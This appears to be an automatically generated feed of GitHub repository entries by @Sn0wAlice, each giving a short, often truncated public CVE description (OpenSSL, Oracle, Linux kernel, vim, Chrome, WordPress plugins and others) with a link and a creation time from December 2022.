**The OPENSSL_LH_flush() function, which empties a hash table, contains a bug that breaks reuse of the memory occuppied by the removed hash table entries. This function is used when decoding certificates or keys. If a long lived process periodically decodes certificates or keys its memory usage will expand without bounds CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1473](https://github.com/Live-Hack-CVE/CVE-2022-1473) create time: 2022-12-29T01:33:10Z

**Online Tours & Travels Management System v1.0 is vulnerable to Arbitrary code execution via ip/tour/admin/operations/update_settings.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42142](https://github.com/Live-Hack-CVE/CVE-2022-42142) create time: 2022-12-29T01:33:06Z

**Konica Minolta bizhub MFP devices before 2022-04-14 have an internal Chromium browser that executes with root (aka superuser) access privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29587](https://github.com/Live-Hack-CVE/CVE-2022-29587) create time: 2022-12-29T01:32:53Z

**Vulnerability in the Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaScript). Supported versions that are affected are Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Ora CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21597](https://github.com/Live-Hack-CVE/CVE-2022-21597) create time: 2022-12-29T01:32:46Z

**Vulnerability in the Siebel Core - DB Deployment and Configuration product of Oracle Siebel CRM (component: Repository Utilities). Supported versions that are affected are 22.8 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Siebel Core - DB Deploym CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21598](https://github.com/Live-Hack-CVE/CVE-2022-21598) create time: 2022-12-29T01:32:43Z

**Vulnerability in the Oracle Database - Advanced Queuing component of Oracle Database Server. The supported version that is affected is 19c. Easily exploitable vulnerability allows high privileged attacker having DBA user privilege with network access via Oracle Net to compromise Oracle Database - Advanced Queuing. Succ CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21596](https://github.com/Live-Hack-CVE/CVE-2022-21596) create time: 2022-12-29T01:32:40Z

**Vulnerability in the Oracle Transportation Management product of Oracle Supply Chain (component: UI Infrastructure). Supported versions that are affected are 6.4.3 and 6.5.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Transportation Management. Succ CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21591](https://github.com/Live-Hack-CVE/CVE-2022-21591) create time: 2022-12-29T01:32:36Z

**xzs v3.8.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /admin/question/edit. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title text field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41431](https://github.com/Live-Hack-CVE/CVE-2022-41431) create time: 2022-12-29T01:32:14Z

**An issue has been discovered in hunter2 affecting all versions before 2.1.0. Improper handling of auto-completion input allows an authenticated attacker to extract other users email addresses CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3540](https://github.com/Live-Hack-CVE/CVE-2022-3540) create time: 2022-12-29T01:32:10Z

**Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks of this vulnera CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39401](https://github.com/Live-Hack-CVE/CVE-2022-39401) create time: 2022-12-29T01:32:07Z

**Vulnerability in the MySQL Shell product of Oracle MySQL (component: Shell: Core Client). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where MySQL Shell executes to compromise MySQL Shell. Successful attacks r CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39403](https://github.com/Live-Hack-CVE/CVE-2022-39403) create time: 2022-12-29T01:32:04Z

**Vulnerability in the PeopleSoft Enterprise Common Components product of Oracle PeopleSoft (component: Approval Framework). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise Common Components. Su CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39406](https://github.com/Live-Hack-CVE/CVE-2022-39406) create time: 2022-12-29T01:32:00Z

**Vulnerability in the MySQL Installer product of Oracle MySQL (component: Installer: General). Supported versions that are affected are 1.6.3 and prior. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where MySQL Installer executes to compromise MySQL Installer. Success CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39404](https://github.com/Live-Hack-CVE/CVE-2022-39404) create time: 2022-12-29T01:31:57Z

**Vulnerability in the MySQL Shell product of Oracle MySQL (component: Shell: Core Client). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows unauthenticated attacker with logon to the infrastructure where MySQL Shell executes to compromise MySQL Shell. While the vulnerabi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39402](https://github.com/Live-Hack-CVE/CVE-2022-39402) create time: 2022-12-29T01:31:53Z

**Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Security). Supported versions that are affected are 8.58, 8.59 and 8.60. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where PeopleSoft Enterprise PeopleTools executes to co CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39407](https://github.com/Live-Hack-CVE/CVE-2022-39407) create time: 2022-12-29T01:31:50Z

**Vulnerability in the Oracle Transportation Management product of Oracle Supply Chain (component: Business Process Automation). Supported versions that are affected are 6.4.3 and 6.5.1. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Transportation Manag CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39409](https://github.com/Live-Hack-CVE/CVE-2022-39409) create time: 2022-12-29T01:31:46Z

**Vulnerability in the Oracle Transportation Management product of Oracle Supply Chain (component: Data, Functional Security). Supported versions that are affected are 6.4.3 and 6.5.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Transportation Manageme CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39420](https://github.com/Live-Hack-CVE/CVE-2022-39420) create time: 2022-12-29T01:31:43Z

**Vulnerability in the Oracle Transportation Management product of Oracle Supply Chain (component: Business Process Automation). Supported versions that are affected are 6.4.3 and 6.5.1. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Transportation Manag CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39411](https://github.com/Live-Hack-CVE/CVE-2022-39411) create time: 2022-12-29T01:31:40Z

**chmd_read_headers in mspack/chmd.c in libmspack before 0.8alpha accepts a filename that has '\0' as its first or second character (such as the "/\0" name). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-18585](https://github.com/Live-Hack-CVE/CVE-2018-18585) create time: 2022-12-28T22:41:26Z

**In mspack/cab.h in libmspack before 0.8alpha and cabextract before 1.8, the CAB block input buffer is one byte too small for the maximal Quantum block, leading to an out-of-bounds write. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-18584](https://github.com/Live-Hack-CVE/CVE-2018-18584) create time: 2022-12-28T22:41:22Z

**Missing message authentication in the meta-protocol in Tinc VPN version 1.0.34 and earlier allows a man-in-the-middle attack to disable the encryption of VPN packets. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-16758](https://github.com/Live-Hack-CVE/CVE-2018-16758) create time: 2022-12-28T22:41:19Z

**tinc 1.0.30 through 1.0.34 has a broken authentication protocol, although there is a partial mitigation. This is fixed in 1.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-16738](https://github.com/Live-Hack-CVE/CVE-2018-16738) create time: 2022-12-28T22:41:15Z

**tinc before 1.0.30 has a broken authentication protocol, without even a partial mitigation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-16737](https://github.com/Live-Hack-CVE/CVE-2018-16737) create time: 2022-12-28T22:41:11Z

**An exploitable code execution vulnerability exists in the XCF image rendering functionality of Simple DirectMedia Layer SDL2_image-2.0.2. A specially crafted XCF image can cause an out-of-bounds write on the heap, resulting in code execution. An attacker can display a specially crafted image to trigger this vulnerabili CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3839](https://github.com/Live-Hack-CVE/CVE-2018-3839) create time: 2022-12-28T22:41:08Z

**An exploitable information disclosure vulnerability exists in the PCX image rendering functionality of Simple DirectMedia Layer SDL2_image-2.0.2. A specially crafted PCX image can cause an out-of-bounds read on the heap, resulting in information disclosure . An attacker can display a specially crafted image to trigger CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3837](https://github.com/Live-Hack-CVE/CVE-2018-3837) create time: 2022-12-28T22:41:05Z

**Prima Systems FlexAir, Versions 2.3.38 and prior. The application allows improper authentication using the MD5 hash value of the password, which may allow an attacker with access to the database to login as admin without decrypting the password. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7666](https://github.com/Live-Hack-CVE/CVE-2019-7666) create time: 2022-12-28T22:46:36Z

**Prima Systems FlexAir, Versions 2.3.38 and prior. An unauthenticated user can send unverified HTTP requests, which may allow the attacker to perform certain actions with administrative privileges if a logged-in user visits a malicious website. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7281](https://github.com/Live-Hack-CVE/CVE-2019-7281) create time: 2022-12-28T22:46:05Z

**Prima Systems FlexAir, Versions 2.3.38 and prior. Parameters sent to scripts are not properly sanitized before being returned to the user, which may allow an attacker to execute arbitrary code in a user’s browser session in context of an affected site. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7671](https://github.com/Live-Hack-CVE/CVE-2019-7671) create time: 2022-12-28T22:46:02Z

**Prima Systems FlexAir, Versions 2.3.38 and prior. The session-ID is of an insufficient length and can be exploited by brute force, which may allow a remote attacker to obtain a valid session and bypass authentication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7280](https://github.com/Live-Hack-CVE/CVE-2019-7280) create time: 2022-12-28T22:45:51Z

**A flaw was found in Ansible Tower when running Openshift. Tower runs a memcached, which is accessed via TCP. An attacker can take advantage of writing a playbook polluting this cache, causing a denial of service attack. This attack would not completely stop the service, but in the worst-case scenario, it can reduce the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10697](https://github.com/Live-Hack-CVE/CVE-2020-10697) create time: 2022-12-28T22:43:57Z

**In create_pinctrl of core.c, there is a possible out of bounds read due to a use after free. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-140550171 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-0427](https://github.com/Live-Hack-CVE/CVE-2020-0427) create time: 2022-12-28T22:43:53Z

**Insulet Omnipod Insulin Management System insulin pump product ID 19191 and 40160 is designed to communicate using a wireless RF with an Insulet manufactured Personal Diabetes Manager device. This wireless RF communication protocol does not properly implement authentication or authorization. An attacker with access to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10627](https://github.com/Live-Hack-CVE/CVE-2020-10627) create time: 2022-12-28T22:43:50Z

**A flaw memory leak in the Linux kernel performance monitoring subsystem was found in the way if using PERF_EVENT_IOC_SET_FILTER. A local user could use this flaw to starve the resources causing denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25704](https://github.com/Live-Hack-CVE/CVE-2020-25704) create time: 2022-12-28T22:43:02Z

**An issue was discovered in the Linux kernel before 5.10. drivers/infiniband/core/ucma.c has a use-after-free because the ctx is reached via the ctx_list in some ucma_migrate_id situations where ucma_close is called, aka CID-f5449e74802c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36385](https://github.com/Live-Hack-CVE/CVE-2020-36385) create time: 2022-12-28T22:42:03Z

**A flaw was found in the HDLC_PPP module of the Linux kernel in versions before 5.9-rc7. Memory corruption and a read overflow is caused by improper input validation in the ppp_cp_parse_cr function which can cause the system to crash or cause a denial of service. The highest threat from this vulnerability is to data con CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25643](https://github.com/Live-Hack-CVE/CVE-2020-25643) create time: 2022-12-28T22:41:01Z

**A memory out-of-bounds read flaw was found in the Linux kernel before 5.9-rc2 with the ext3/ext4 file system, in the way it accesses a directory with broken indexing. This flaw allows a local user to crash the system if the directory exists. The highest threat from this vulnerability is to system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14314](https://github.com/Live-Hack-CVE/CVE-2020-14314) create time: 2022-12-28T22:40:50Z

**SDL (Simple DirectMedia Layer) through 2.0.12 has an Integer Overflow (and resultant SDL_memcpy heap corruption) in SDL_BlitCopy in video/SDL_blit_copy.c via a crafted .BMP file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14409](https://github.com/Live-Hack-CVE/CVE-2020-14409) create time: 2022-12-28T22:40:46Z

**In the Linux kernel before 5.7.8, fs/nfsd/vfs.c (in the NFS server) can set incorrect permissions on new filesystem objects when the filesystem lacks ACL support, aka CID-22cf8419f131. This occurs because the current umask is not considered. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24394](https://github.com/Live-Hack-CVE/CVE-2020-24394) create time: 2022-12-28T22:40:43Z

**A flaw was found in the Linux kernel. A use-after-free was found in the way the console subsystem was using ioctls KDGKBSENT and KDSKBSENT. A local user could use this flaw to get read memory access out of bounds. The highest threat from this vulnerability is to data confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25656](https://github.com/Live-Hack-CVE/CVE-2020-25656) create time: 2022-12-28T22:40:39Z

**The HR Portal of Soar Cloud System fails to manage access control. While obtaining user ID, remote attackers can access sensitive data via a specific data packet, such as user’s login information, further causing the login function not to work. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22853](https://github.com/Live-Hack-CVE/CVE-2021-22853) create time: 2022-12-28T22:49:31Z

**An improper access control vulnerability was identified in GitHub Enterprise Server that allowed authenticated users of the instance to gain write access to unauthorized repositories via specifically crafted pull requests and REST API requests. An attacker would need to be able to fork the targeted repository, a settin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22861](https://github.com/Live-Hack-CVE/CVE-2021-22861) create time: 2022-12-28T22:49:27Z

**HGiga EIP product lacks ineffective access control in certain pages that allow attackers to access database or perform privileged functions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22850](https://github.com/Live-Hack-CVE/CVE-2021-22850) create time: 2022-12-28T22:49:24Z

**A CWE-200: Information Exposure vulnerability exists which could cause the troubleshooting archive to be accessed. Affected Products: 1-Phase Uninterruptible Power Supply (UPS) using NMC2 including Smart-UPS, Symmetra, and Galaxy 3500 with Network Management Card 2 (NMC2): AP9630/AP9630CH/AP9630J, AP9631/AP9631CH/AP963 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22815](https://github.com/Live-Hack-CVE/CVE-2021-22815) create time: 2022-12-28T22:49:17Z

**A CWE-200: Information Exposure vulnerability exists that could cause sensitive information of files located in the web root directory to leak when an attacker sends a HTTP request to the web server of the device. Affected Product: Modicon M340 CPUs: BMXP34 (Versions prior to V3.40), Modicon M340 X80 Ethernet Communica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22785](https://github.com/Live-Hack-CVE/CVE-2021-22785) create time: 2022-12-28T22:49:13Z

**Cscape (All versions prior to 9.90 SP4) is configured by default to be installed for all users, which allows full permissions, including read/write access. This may allow unprivileged users to modify the binaries and configuration files and lead to local privilege escalation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22682](https://github.com/Live-Hack-CVE/CVE-2021-22682) create time: 2022-12-28T22:49:10Z

**The Ultimate Product Catalog WordPress plugin before 5.0.26 does not have authorisation and CSRF checks in some AJAX actions, which could allow any authenticated users, such as subscriber to call them and add arbitrary products, or change the plugin's settings for example CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24993](https://github.com/Live-Hack-CVE/CVE-2021-24993) create time: 2022-12-28T22:48:55Z

**The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25003](https://github.com/Live-Hack-CVE/CVE-2021-25003) create time: 2022-12-28T22:48:52Z

**The Plus Addons for Elementor - Pro WordPress plugin before 5.0.7 does not validate the qvquery parameter of the tp_get_dl_post_info_ajax AJAX action, which could allow unauthenticated users to retrieve sensitive information, such as private and draft posts CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24948](https://github.com/Live-Hack-CVE/CVE-2021-24948) create time: 2022-12-28T22:48:45Z

**An improper access control vulnerability was identified in the GitHub Enterprise Server GraphQL API that allowed authenticated users of the instance to modify the maintainer collaboration permission of a pull request without proper authorization. By exploiting this vulnerability, an attacker would be able to gain acces CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22863](https://github.com/Live-Hack-CVE/CVE-2021-22863) create time: 2022-12-28T22:48:38Z

**An improper access control vulnerability was identified in GitHub Enterprise Server that allowed an authenticated user with the ability to fork a repository to disclose Actions secrets for the parent repository of the fork. This vulnerability existed due to a flaw that allowed the base reference of a pull request to be CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22862](https://github.com/Live-Hack-CVE/CVE-2021-22862) create time: 2022-12-28T22:48:35Z

**An improper access control vulnerability was identified in GitHub Enterprise Server that allowed access tokens generated from a GitHub App's web authentication flow to read private repository metadata via the REST API without having been granted the appropriate permissions. To exploit this vulnerability, an attacker wo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22865](https://github.com/Live-Hack-CVE/CVE-2021-22865) create time: 2022-12-28T22:48:31Z

**In the bindata RubyGem before version 2.4.10 there is a potential denial-of-service vulnerability. In affected versions it is very slow for certain classes in BinData to be created. For example BinData::Bit100000, BinData::Bit100001, BinData::Bit100002, BinData::Bit<N>. In combination with <user_input>.constantize ther CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32823](https://github.com/Live-Hack-CVE/CVE-2021-32823) create time: 2022-12-28T22:48:05Z

**Shopware is an open source eCommerce platform. In versions prior to 6.4.1.1 the admin api has exposed some internal hidden fields when an association has been loaded with a to many reference. Users are recommend to update to version 6.4.1.1. You can get the update to 6.4.1.1 regularly via the Auto-Updater or directly v CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32716](https://github.com/Live-Hack-CVE/CVE-2021-32716) create time: 2022-12-28T22:48:02Z

**Shopware is an open source eCommerce platform. In versions prior to 6.4.1.1 private files publicly accessible with Cloud Storage providers when the hashed URL is known. Users are recommend to first change their configuration to set the correct visibility according to the documentation. The visibility must be at the sam CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32717](https://github.com/Live-Hack-CVE/CVE-2021-32717) create time: 2022-12-28T22:47:51Z

**myVesta Control Panel before 0.9.8-26-43 and Vesta Control Panel before 0.9.8-26 are vulnerable to command injection. An authenticated and remote administrative user can execute arbitrary commands via the v_sftp_license parameter when sending HTTP POST requests to the /edit/server endpoint. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46850](https://github.com/Live-Hack-CVE/CVE-2021-46850) create time: 2022-12-28T22:47:48Z

**http4s is an open source scala interface for HTTP. In affected versions http4s is vulnerable to response-splitting or request-splitting attacks when untrusted user input is used to create any of the following fields: Header names (`Header.name`å), Header values (`Header.value`), Status reason phrases (`Status.reason`), CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41084](https://github.com/Live-Hack-CVE/CVE-2021-41084) create time: 2022-12-28T22:47:45Z

**An improper access control vulnerability in GitHub Enterprise Server allowed a workflow job to execute in a self-hosted runner group it should not have had access to. This affects customers using self-hosted runner groups for access control. A repository with access to one enterprise runner group could access all of th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22869](https://github.com/Live-Hack-CVE/CVE-2021-22869) create time: 2022-12-28T22:47:41Z

**Dell SupportAssist Client Consumer versions 3.9.13.0 and any versions prior to 3.9.13.0 contain an arbitrary file deletion vulnerability that can be exploited by using the Windows feature of NTFS called Symbolic links. Symbolic links can be created by any(non-privileged) user under some object directories, but by thems CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36286](https://github.com/Live-Hack-CVE/CVE-2021-36286) create time: 2022-12-28T22:47:38Z

**The MacOS version of Multipass, version 1.7.0, fixed in 1.7.2, accidentally installed the application directory with incorrect owner. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3747](https://github.com/Live-Hack-CVE/CVE-2021-3747) create time: 2022-12-28T22:47:35Z

**Dell Enterprise SONiC OS, versions 3.3.0 and earlier, contains a sensitive information disclosure vulnerability. An authenticated malicious user with access to the system may use the TACACS\Radius credentials stored to read sensitive information and use it in further attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36309](https://github.com/Live-Hack-CVE/CVE-2021-36309) create time: 2022-12-28T22:47:31Z

**In PHP versions 7.3.x below 7.3.29, 7.4.x below 7.4.21 and 8.0.x below 8.0.8, when using Firebird PDO driver extension, a malicious database server could cause crashes in various database functions, such as getAttribute(), execute(), fetch() and others by returning invalid response data that is not parsed correctly by CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21704](https://github.com/Live-Hack-CVE/CVE-2021-21704) create time: 2022-12-28T22:47:28Z

**DOS: Incorrect 802154 Frame Validation for Omitted Source / Dest Addresses. Zephyr versions >= > v2.4.0 contain NULL Pointer Dereference (CWE-476), Attempt to Access Child of a Non-structure Pointer (CWE-588). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-94jg-2p6q-5364 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3319](https://github.com/Live-Hack-CVE/CVE-2021-3319) create time: 2022-12-28T22:47:24Z

**Helm is a tool for managing Charts (packages of pre-configured Kubernetes resources). In versions of helm prior to 3.6.1, a vulnerability exists where the username and password credentials associated with a Helm repository could be passed on to another domain referenced by that Helm repository. This issue has been reso CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32690](https://github.com/Live-Hack-CVE/CVE-2021-32690) create time: 2022-12-28T22:47:21Z

**Nextcloud Android app is the Android client for Nextcloud. In versions prior to 3.16.1, a malicious app on the same device could have gotten access to the shared preferences of the Nextcloud Android application. This required user-interaction as a victim had to initiate the sharing flow and choose the malicious app. Th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32695](https://github.com/Live-Hack-CVE/CVE-2021-32695) create time: 2022-12-28T22:47:17Z

**A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to obtain sensitive information. This vulnerability is due to improper enforcement of administrator privilege levels for low-value sensitive data. An attacker with read-only admini CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34702](https://github.com/Live-Hack-CVE/CVE-2021-34702) create time: 2022-12-28T22:47:03Z

**Wings is the control plane software for the open source Pterodactyl game management system. All versions of Pterodactyl Wings prior to `1.4.4` are vulnerable to system resource exhaustion due to improper container process limits being defined. A malicious user can consume more resources than intended and cause downstre CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32699](https://github.com/Live-Hack-CVE/CVE-2021-32699) create time: 2022-12-28T22:47:00Z

**Multiple vulnerabilities in the Cisco ATA 190 Series Analog Telephone Adapter Software could allow an attacker to perform a command injection attack resulting in remote code execution or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details se CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34710](https://github.com/Live-Hack-CVE/CVE-2021-34710) create time: 2022-12-28T22:46:56Z

**Jenkins Git Plugin 4.8.2 and earlier does not escape the Git SHA-1 checksum parameters provided to commit notifications when displaying them in a build cause, resulting in a stored cross-site scripting (XSS) vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21684](https://github.com/Live-Hack-CVE/CVE-2021-21684) create time: 2022-12-28T22:46:53Z

**A path traversal vulnerability in the Moxa MXview Network Management software Versions 3.x to 3.2.2 may allow an attacker to create or overwrite critical files used to execute code, such as programs or libraries. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38460](https://github.com/Live-Hack-CVE/CVE-2021-38460) create time: 2022-12-28T22:46:50Z

**Multiple stored cross-site scripting vulnerabilities in the web user interface of IPFire versions prior to 2.27 allows a remote authenticated attacker with administrative privilege to inject an arbitrary script. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36368](https://github.com/Live-Hack-CVE/CVE-2022-36368) create time: 2022-12-28T22:49:34Z

**Kirby is a flat-file CMS. In versions prior to 3.5.8.2, 3.6.6.2, 3.7.5.1, and 3.8.1, Kirby is subject to user enumeration due to Improper Restriction of Excessive Authentication Attempts. This vulnerability affects you only if you are using the `code` or `password-reset` auth method with the `auth.methods` option or if CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39314](https://github.com/Live-Hack-CVE/CVE-2022-39314) create time: 2022-12-28T22:49:21Z

**Stack-based buffer overflow in WTViewerE series WTViewerE 761941 from 1.31 to 1.61 and WTViewerEfree from 1.01 to 1.52 allows an attacker to cause the product to crash by processing a long file name. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40984](https://github.com/Live-Hack-CVE/CVE-2022-40984) create time: 2022-12-28T22:48:49Z

**Information disclosure vulnerability in Android App 'IIJ SmartKey' versions prior to 2.1.4 allows an attacker to obtain a one-time password issued by the product under certain conditions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41986](https://github.com/Live-Hack-CVE/CVE-2022-41986) create time: 2022-12-28T22:48:42Z

**In free5GC 3.2.1, a malformed NGAP message can crash the AMF and NGAP decoders via an index-out-of-range panic in aper.GetBitString. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43677](https://github.com/Live-Hack-CVE/CVE-2022-43677) create time: 2022-12-28T22:48:28Z

**Improper authorization in handler for custom URL scheme vulnerability in Lemon8 App for Android versions prior to 3.3.5 and Lemon8 App for iOS versions prior to 3.3.5 allows a remote attacker to lead a user to access an arbitrary website via the vulnerable App. As a result, the user may become a victim of a phishing at CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41797](https://github.com/Live-Hack-CVE/CVE-2022-41797) create time: 2022-12-28T22:48:25Z

**In Eclipse Openj9 before version 0.35.0, interface calls can be inlined without a runtime type check. Malicious bytecode could make use of this inlining to access or modify memory via an incompatible type. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3676](https://github.com/Live-Hack-CVE/CVE-2022-3676) create time: 2022-12-28T22:47:59Z

**Juiker app hard-coded its AES key in the source code. A physical attacker, after getting the Android root privilege, can use the AES key to decrypt users’ ciphertext and tamper with it. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38117](https://github.com/Live-Hack-CVE/CVE-2022-38117) create time: 2022-12-28T22:47:55Z

**Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0220. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2849](https://github.com/Live-Hack-CVE/CVE-2022-2849) create time: 2022-12-28T22:40:35Z

**Use After Free in GitHub repository vim/vim prior to 9.0.0221. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2862](https://github.com/Live-Hack-CVE/CVE-2022-2862) create time: 2022-12-28T22:40:31Z

**NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.0224. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2874](https://github.com/Live-Hack-CVE/CVE-2022-2874) create time: 2022-12-28T22:40:27Z

**Out of bounds read in compositing in Google Chrome prior to 102.0.5005.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2010](https://github.com/Live-Hack-CVE/CVE-2022-2010) create time: 2022-12-28T21:17:47Z

**Use after free in ANGLE in Google Chrome prior to 102.0.5005.115 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2011](https://github.com/Live-Hack-CVE/CVE-2022-2011) create time: 2022-12-28T21:17:32Z

**A deserialization flaw was discovered in the jackson-databind in versions before 2.8.10 and 2.9.1, which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper. This issue extends the previous flaw CVE-2017-7525 by blacklisting CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-15095](https://github.com/Live-Hack-CVE/CVE-2017-15095) create time: 2022-12-28T21:57:33Z

**A vulnerability classified as critical was found in Itech Dating Script 3.26. Affected by this vulnerability is an unknown functionality of the file /see_more_details.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and ma CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20135](https://github.com/Live-Hack-CVE/CVE-2017-20135) create time: 2022-12-28T21:22:04Z

**A vulnerability has been found in Anvsoft PDFMate PDF Converter Pro 1.7.5.0 and classified as critical. The manipulation leads to memory corruption. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20144](https://github.com/Live-Hack-CVE/CVE-2017-20144) create time: 2022-12-28T21:20:46Z

